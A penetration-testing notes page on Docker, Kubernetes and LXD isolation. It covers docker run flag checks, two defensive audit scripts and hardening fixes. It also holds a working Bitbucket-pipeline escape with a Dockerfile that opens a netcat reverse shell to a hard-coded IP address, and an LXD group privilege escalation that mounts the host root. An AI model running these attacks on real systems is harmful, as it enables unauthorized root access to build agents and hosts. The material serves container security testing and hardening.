Containers

Kubernetes

Kubernetes Pentest Methodology Part 1
Kubernetes Pentest Methodology Part 2
Kubernetes Pentest Methodology Part 3

Bad Pods: Kubernetes Pod Privilege Escalation

The Kubenomicon: Kubernetes from an offensive perspective

Docker

Escaping Namespaces
The Dangers of Docker.sock
Abusing Privileged and Unprivileged Linux Containers
Understanding and Hardening Linux Containers
A light-weight process isolation tool
Docker: Security Myths
Seccomp security profiles for Docker
Root your Docker host in 10 seconds for fun and profit

Source

Does the Docker daemon have an authorization (authz) plugin?
- check /var/lib/authz-broker/
Does the Docker daemon use user namespaces (--userns-remap)?
Check for symbolic-link bypasses of volume mounting (a symlink inside a mounted directory that resolves back into the host filesystem)

Check for protections inside a container (the /host/ami binary prints the amicontained-style summary below; with --privileged the bounding set holds every capability, seccomp is disabled and AppArmor is unconfined):

>>> sudo docker run --rm --privileged -v `pwd`:/host -it node:latest /bin/bash
root@acf8b3edec59:/# /host/ami
Container Runtime: docker
Has Namespaces:
        pid: true
        user: false
AppArmor Profile: unconfined
Capabilities:
        BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled

Check for network namespacing (--net host shares the host's network stack; the prompt shows the host's hostname, lupin):

>>> sudo docker run --rm --net host -v `pwd`:/host -it node:latest /bin/bash
root@lupin:/#

Check for volume mounting of the host root filesystem:

>>> sudo docker run --rm --net host --volume /:/rootfs -v `pwd`:/host -it node:latest /bin/bash
root@lupin:/#

Check For device mapping:

sudo docker run --rm --device /:/devhost -v `pwd`:/host -it node:latest /bin/bash

Check for disabling the seccomp profile:

>>> sudo docker run --rm --security-opt seccomp=unconfined -v `pwd`:/host -it node:latest /bin/bash
root@73b3de272685:/# exit

Check for disabling the AppArmor profile:

>>> sudo docker run --rm --security-opt apparmor=unconfined -v `pwd`:/host -it node:latest /bin/bash
root@edb17ce6126a:/# exit

Check for setting custom kernel parameters (--sysctl is limited to namespaced sysctls):

>>> sudo docker run --rm --sysctl net.ipv4.ip_forward=1 -v `pwd`:/host -it node:latest /bin/bash
root@d4e604c9db9a:/#

Check for user namespacing (--userns host opts the container out of the daemon's userns-remap) and UTS namespacing (--uts host shares the host's hostname namespace):

>>> sudo docker run --rm --userns host -v `pwd`:/host -it node:latest /bin/bash
root@c22b43ed3c91:/# exit
>>> sudo docker run --rm --uts host -v `pwd`:/host -it node:latest /bin/bash
root@c22b43ed3c91:/# exit

Check for additional capabilities (--cap-add ALL grants the full bounding set seen under --privileged above, but does not by itself disable seccomp or AppArmor or expose host devices):

>>> sudo docker run --rm --cap-add ALL -v `pwd`:/host -it node:latest /bin/bash
root@4fbd268aeb7d:/#

Check for IPC namespacing:

>>> sudo docker run --rm --ipc host -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#

Check for process namespacing:

>>> sudo docker run --rm --pid host -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#

Check for root-user mapping:

>>> sudo docker run --rm --map-root-user -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#

Note: --map-root-user is an option of unshare(1), not of docker run, so the daemon rejects it as an unknown flag. Whether container root is real host root depends on the daemon's --userns-remap setting, which the --userns host check above exercises.

Check for mounting with --mount (it uses key=value syntax; the short form --mount /:/rootfs is rejected as an invalid argument):

>>> sudo docker run --rm --mount type=bind,source=/,target=/rootfs -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
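All of the checks above come down to what the kernel lets the container process do, and that can be read from /proc/self instead of trusted from docker run flags. The script below is an added example, not code from the original page: it decodes the capability bounding set, the seccomp mode, NoNewPrivs and the uid_map, and flags cap_sys_admin. The status and uid_map text at the bottom are constructed samples of a plain `docker run` container (default capability set, seccomp filter, no userns-remap); the `--live` switch is a name chosen here.

```shell
#!/bin/sh
# Container isolation self-check from the kernel's point of view.
# Added example, not code from the original page.

# Capability names in bit order, bit 0 = cap_chown (linux/capability.h).
CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid \
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock \
ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot \
sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control \
setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read perfmon \
bpf checkpoint_restore"

# cap_names HEXMASK -> space-separated names of the set bits (CapBnd/CapEff format)
cap_names() {
    mask=$(printf '%d' "0x$1")
    i=0
    out=""
    for name in $CAP_NAMES; do
        if [ $(( (mask >> i) & 1 )) -eq 1 ]; then
            out="$out $name"
        fi
        i=$((i + 1))
    done
    printf '%s\n' "${out# }"
}

# has_cap HEXMASK NAME -> exit 0 if NAME is in the mask
has_cap() {
    case " $(cap_names "$1") " in
        *" $2 "*) return 0 ;;
        *) return 1 ;;
    esac
}

# seccomp_mode STATUS_TEXT -> disabled|strict|filter, from the Seccomp: field
seccomp_mode() {
    case $(printf '%s\n' "$1" | awk '/^Seccomp:/ {print $2}') in
        0) echo disabled ;;
        1) echo strict ;;
        2) echo filter ;;
        *) echo unknown ;;
    esac
}

# userns_remapped UIDMAP_TEXT -> exit 0 if inside uid 0 maps to a non-zero host uid
userns_remapped() {
    # /proc/self/uid_map lines: <inside-start> <outside-start> <count>
    printf '%s\n' "$1" | awk '$1 == 0 && $2 != 0 { found = 1 } END { exit !found }'
}

# audit_status STATUS_TEXT UIDMAP_TEXT -> one-line verdict from the parsed fields
audit_status() {
    capbnd=$(printf '%s\n' "$1" | awk '/^CapBnd:/ {print $2}')
    nnp=$(printf '%s\n' "$1" | awk '/^NoNewPrivs:/ {print $2}')
    verdict="caps=$(cap_names "$capbnd" | wc -w | tr -d ' ') seccomp=$(seccomp_mode "$1") no_new_privs=$nnp"
    if userns_remapped "$2"; then
        verdict="$verdict userns=remapped"
    else
        verdict="$verdict userns=host"
    fi
    if has_cap "$capbnd" sys_admin; then
        verdict="$verdict WARNING:cap_sys_admin"
    fi
    printf '%s\n' "$verdict"
}

# Constructed sample (not captured output): the relevant lines of /proc/self/status
# and /proc/self/uid_map inside a default `docker run` container.
SAMPLE_STATUS="Name: bash
Uid: 0 0 0 0
NoNewPrivs: 0
CapBnd: 00000000a80425fb
Seccomp: 2"
SAMPLE_UIDMAP="         0          0 4294967295"

# `--live` (name chosen here) reads the real /proc files of the current process.
if [ "${1:-}" = "--live" ]; then
    audit_status "$(cat /proc/self/status)" "$(cat /proc/self/uid_map)"
else
    audit_status "$SAMPLE_STATUS" "$SAMPLE_UIDMAP"
fi
```

Run it with `--live` inside the container under test; the mask 00000000a80425fb in the sample is Docker's default set of 14 capabilities, whereas the --privileged and --cap-add ALL runs above show a bounding set that includes sys_admin.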

Reverse Shell through Docker

bitbucket-pipelines.yml (the step symlinks / into the clone directory and bind-mounts that path through the pipeline's Docker service, so the container sees the build agent's root filesystem):

image:
  name: atlassian/default-image:latest
pipelines:
  default:
    - step:
        script:
          - ln -s / $BITBUCKET_CLONE_DIR/ln
          - curl -oDockerfile https://gist.github.com/staaldraad/b805639cf44363692f13493f651c5689/raw/f8f65876cd464611ad0f7d365a9cf36a950fde36/Dockerfile
          - docker build . -t xyz
          - docker run -i --rm -v $BITBUCKET_CLONE_DIR/ln/:/ln xyz:latest
        services:
          - docker
        caches:
          - docker

Dockerfile (busybox nc reverse shell back to the listener at 139.59.42.102:443):

FROM docker
RUN apk update
RUN echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 139.59.42.102 443 >/tmp/f" > /pew.sh
RUN chmod +x /pew.sh
ENTRYPOINT /pew.sh

Docker Sockets

Docker socket locations (docker.sock is group-writable by docker, so membership in that group is equivalent to root on the host):

>>> sudo ls -al /var/run/docker/containerd
total 8
drwx------ 3 root root 160 Jan 28 18:00 .
drwx------ 8 root root 180 Jan 28 12:53 ..
srw-rw---- 1 root root   0 Jan 28 12:52 containerd-debug.sock
-rw-r----- 1 root root   6 Jan 28 12:52 containerd.pid
srw-rw---- 1 root root   0 Jan 28 12:52 containerd.sock
srw-rw---- 1 root root   0 Jan 28 12:52 containerd.sock.ttrpc
-rw------- 1 root root 706 Jan 28 12:52 containerd.toml
drwx--x--x 4 root root  80 Jan 28 12:52 daemon
>>> sudo ls -al /var/run/doc*.*
-rw-r--r-- 1 root root   0 Jan 28 12:52 /var/run/docker.pid
srw-rw---- 1 root docker 0 Jan 28 12:52 /var/run/docker.sock

Fixes

Use user namespaces (run the daemon with --userns-remap):

  • Container root then maps to an unprivileged host UID, so a host root bind mount, a mapped device or a shared host namespace no longer hands out real root; the daemon also refuses --pid host and --net host for containers that keep the remapped user namespace.

Prevent opting out of user namespaces through the authz plugin:

  • The flag to block is --userns host; the --userns host check above verifies this.

Prevent adding unnecessary capabilities:

  • --cap-add (above all --cap-add ALL) exposes kernel functionality the default capability set withholds.

Prevent seccomp bypass through the authz plugin:

  • Block --security-opt seccomp=unconfined.

Prevent AppArmor bypass through the authz plugin:

  • Block --security-opt apparmor=unconfined.
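A host-side counterpart to the checks above, for auditing whether the fixes in this list hold on running containers. The script below is an added example, not the page's own code: it flags every HostConfig setting the checks exercised by grepping the JSON that `docker inspect --format '{{json .HostConfig}}'` prints, so it needs no jq. The two JSON strings at the bottom are constructed samples (one container started with all the risky flags, one clean), and the `--live` switch is a name chosen here.

```shell
#!/bin/sh
# Audit container HostConfig for the flags an authz plugin should block.
# Added example, not code from the original page.

# check REGEX MESSAGE -> print MESSAGE if REGEX matches the $json under audit
check() {
    printf '%s' "$json" | grep -Eq "$1" && printf '%s\n' "$2"
    return 0
}

# audit_hostconfig JSON -> one finding per line (no output when clean)
audit_hostconfig() {
    json=$1
    check '"Privileged": *true'                 'privileged container (--privileged)'
    check '"PidMode": *"host"'                  'host PID namespace (--pid host)'
    check '"IpcMode": *"host"'                  'host IPC namespace (--ipc host)'
    check '"NetworkMode": *"host"'              'host network namespace (--net host)'
    check '"UTSMode": *"host"'                  'host UTS namespace (--uts host)'
    check '"UsernsMode": *"host"'               'user namespace remap disabled (--userns host)'
    check '"CapAdd": *\[[^]]*"(CAP_)?(ALL|SYS_ADMIN|SYS_MODULE|SYS_PTRACE|NET_ADMIN)"' \
                                                'dangerous capability added (--cap-add)'
    check 'seccomp=unconfined'                  'seccomp disabled (--security-opt seccomp=unconfined)'
    check 'apparmor=unconfined'                 'AppArmor disabled (--security-opt apparmor=unconfined)'
    check '"Binds": *\[[^]]*"/:'                'host root bind-mounted (-v /:...)'
    check '"Source": *"/"'                      'host root mounted (--mount type=bind,source=/,...)'
    check 'docker\.sock:'                       'docker socket mounted into the container'
    check '"Devices": *\[[^]]*"PathOnHost"'     'host device mapped (--device)'
}

# count_findings JSON -> number of findings (0 when clean)
count_findings() {
    audit_hostconfig "$1" | grep -c . || true
}

# Constructed samples (not captured output) in the compact form that
# `docker inspect --format '{{json .HostConfig}}' <id>` prints.
BAD_HOSTCONFIG='{"Binds":["/:/rootfs","/var/run/docker.sock:/var/run/docker.sock"],"NetworkMode":"host","Privileged":true,"PidMode":"host","IpcMode":"host","UsernsMode":"host","CapAdd":["ALL"],"SecurityOpt":["seccomp=unconfined","apparmor=unconfined"],"Devices":[{"PathOnHost":"/dev/sda","PathInContainer":"/dev/sda","CgroupPermissions":"rwm"}]}'
CLEAN_HOSTCONFIG='{"Binds":null,"NetworkMode":"bridge","Privileged":false,"PidMode":"","IpcMode":"private","UsernsMode":"","CapAdd":null,"SecurityOpt":null,"Devices":[]}'

# `--live` (name chosen here) audits every running container on this host.
if [ "${1:-}" = "--live" ]; then
    for id in $(docker ps -q); do
        printf '== %s\n' "$id"
        audit_hostconfig "$(docker inspect --format '{{json .HostConfig}}' "$id")"
    done
else
    printf '== constructed bad sample\n'
    audit_hostconfig "$BAD_HOSTCONFIG"
    printf '== constructed clean sample (%s findings)\n' "$(count_findings "$CLEAN_HOSTCONFIG")"
fi
```

Every finding corresponds to one of the docker run checks in the Docker section; an authz plugin that denies those options, plus --userns-remap on the daemon, should leave the live run reporting nothing.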

LXD

Build the LXD image on another machine:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
>>> ls

Import the image and start a privileged container on the target (as a member of the lxd group); the host root filesystem becomes writable under /mnt/root:

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
# Show that the image was imported
lxc image list
# Add a privileged container
lxc init myimage ignite -c security.privileged=true
# Mount the root file system into the container
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
# Start the container
lxc start ignite
# Start a shell in the container
lxc exec ignite /bin/sh